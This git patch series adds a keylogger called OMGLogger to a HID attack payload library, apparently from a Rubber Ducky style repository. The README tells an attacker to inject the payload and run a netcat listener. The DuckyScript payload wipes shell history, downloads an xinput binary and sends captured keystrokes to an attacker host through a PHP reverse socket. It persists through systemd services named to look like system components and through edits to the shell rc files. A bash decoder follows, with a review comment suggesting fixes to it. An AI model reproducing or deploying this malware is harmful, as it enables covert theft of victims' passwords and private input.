From a08e420a23315edf4f9f253c8d29db443a444b40 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Wed, 18 May 2022 21:00:53 +0530
Subject: [PATCH 1/3] Uploading OMGLogger
---
 .../library/credentials/OMGLogger/README.md | 50 +++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 payloads/library/credentials/OMGLogger/README.md
diff --git a/payloads/library/credentials/OMGLogger/README.md b/payloads/library/credentials/OMGLogger/README.md
new file mode 100644
index 0000000..b27bf2b
--- /dev/null
+++ b/payloads/library/credentials/OMGLogger/README.md
@@ -0,0 +1,50 @@
+## About:
+* Title: OMGLogger
+* Description: Key logger which sends each and every key stroke of target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID
+
+## OMGLogger: OMGLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
+
+### Features:
+* Live keystroke capturing.
+* Detailed key logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Encoding payload and injecting on target's system.
+* Checks whether internet is connected to the target system.
+* If internet is connected then it sends raw keystrokes to attacker.
+* Attacker processes raw keystrokes.
+
+### Changes to be made in payload:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `43`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `59`.
+
+### Usage:
+1. Encode payload.txt and inject into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -lvp > ` use this command to create new logfile with raw keystrokes.
+* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile.
+3. Process raw keystrokes using OMGLoggerDecoder utility:
+```
+./OMGLoggerDecoder
+OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger.
+
+Usage:
+Decode captured log: [./OMGLoggerDecoder -f -m -o ]
+
+Options:
+-f Specify Log file.
+-m Select Mode(normal|informative)
+-o Specify Output file.
+-h For this banner.
+```
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
From 46f5f0e13ab69ee0ea165b69167f89de14de4619 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Wed, 18 May 2022 21:02:35 +0530
Subject: [PATCH 2/3] Uploading Payload
---
 .../library/credentials/OMGLogger/payload.txt | 93 +++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 payloads/library/credentials/OMGLogger/payload.txt
diff --git a/payloads/library/credentials/OMGLogger/payload.txt b/payloads/library/credentials/OMGLogger/payload.txt
new file mode 100644
index 0000000..ec30c15
--- /dev/null
+++ b/payloads/library/credentials/OMGLogger/payload.txt
@@ -0,0 +1,93 @@
+REM Title: DuckyLogger
+REM Description: Key logger which sends each and every key stroke of target remotely/locally.
+REM AUTHOR: drapl0n
+REM Version: 1.0
+REM Category: Credentials
+REM Target: Unix-like operating systems with systemd
+REM Attackmodes: HID
+
+REM [Note]
+REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
+
+REM [keeping tracks clear]
+DELAY 5000
+CTRL ALT t
+DELAY 400
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+ENTER
+DELAY 100
+
+REM [creating key logging mechanism]
+STRING mkdir /var/tmp/.system
+ENTER
+DELAY 100
+STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/sys
+ENTER
+DELAY 100
+
+REM [importing xinput]
+STRING cd /var/tmp/.system/
+ENTER
+DELAY 100
+STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
+ENTER
+DELAY 5000
+STRING chmod +x xinput
+ENTER
+DELAY 100
+
+REM [creating reverse shell]
+STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? 
-eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING mkdir -p ~/.config/systemd/user
+ENTER
+DELAY 200
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+ENTER
+DELAY 100
+
+REM [creating reboot script incase if listner stops or targets internet connection gets lost]
+STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/reboot
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+ENTER
+DELAY 100
+
+REM [enabling service]
+STRING systemctl --user daemon-reload
+ENTER
+DELAY 300
+STRING systemctl --user enable --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user enable --now reboot.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now reboot.service
+ENTER
+DELAY 100
+
+REM [autostarting service on terminal/shell launch]
+STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? 
= 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+ENTER
+DELAY 100
+STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
+ENTER
From 60112142d61bb1768a2585b0dce019d61593ed80 Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com>
Date: Wed, 18 May 2022 21:03:29 +0530
Subject: [PATCH 3/3] Uploading OMGLoggerDecoder
---
 .../credentials/OMGLogger/OMGLoggerDecoder | 51 +++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 payloads/library/credentials/OMGLogger/OMGLoggerDecoder
diff --git a/payloads/library/credentials/OMGLogger/OMGLoggerDecoder b/payloads/library/credentials/OMGLogger/OMGLoggerDecoder
new file mode 100644
index 0000000..b096e5e
--- /dev/null
+++ b/payloads/library/credentials/OMGLogger/OMGLoggerDecoder
@@ -0,0 +1,51 @@
+#!/bin/bash
+usage () {
+ echo -e "OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger.\n"
+ echo -e "Usage: \nDecode captured log:\t[./OMGLoggerDecoder -f -m -o ]";
+ echo -e "\nOptions:"
+ echo -e "-f\tSpecify Log file."
+ echo -e "-m\tSelect Mode(normal|informative)"
+ echo -e "-o\tSpecify Output file."
+ echo -e "-h\tFor this banner."
+}
+while getopts o:m:f:h: flag
+do
+ case "${flag}" in
+ o) output=$OPTARG ;;
+ m) mode=$OPTARG ;;
+ f) filename=$OPTARG ;;
+ h) help=$OPTARG ;;
+ *)
+ usage
+ exit 1
+ esac
+done
+
+if [ -z "$output" ] && [ -z "$filename" ]; then
+ usage
+ exit 1
+fi
+if [ -z "$filename" ]; then
+ echo -e "OMGLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
+ exit 1
+fi
+if [ -z "$output" ]; then
+ echo -e "OMGLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ -z "$mode" ]; then
+ echo -e "OMGLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
+ echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
+ exit 1
+fi
+if [ "$mode" == "normal" ] ; then
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
+ exit 1
+fi
+if [ "$mode" == "informative" ] ; then
+ awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
+ exit 1
+fi
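Review bot: The option spec `o:m:f:h:` on the `while getopts` line declares `-h` as taking an argument, so a bare `./OMGLoggerDecoder -h` is reported by getopts as a missing argument and falls through to the `*)` arm, and even `-h x` only stores `help=$OPTARG`, which nothing reads, so the banner the README promises is never printed; change the spec to `while getopts o:m:f:h flag` and the arm to `h) usage; exit 0 ;;`. Both processing branches end in `exit 1` after a successful write to the output file, so a caller cannot distinguish success from the error paths above it; those should be `exit 0`. `$filename` and `$output` are unquoted in the two awk pipelines and the redirections, so a path containing whitespace or a glob character is split or expanded; quote them as `"$filename"` and `> "$output"`. The invalid-mode message also names `DuckyLoggerDecoder` while every other message in the script says `OMGLoggerDecoder`.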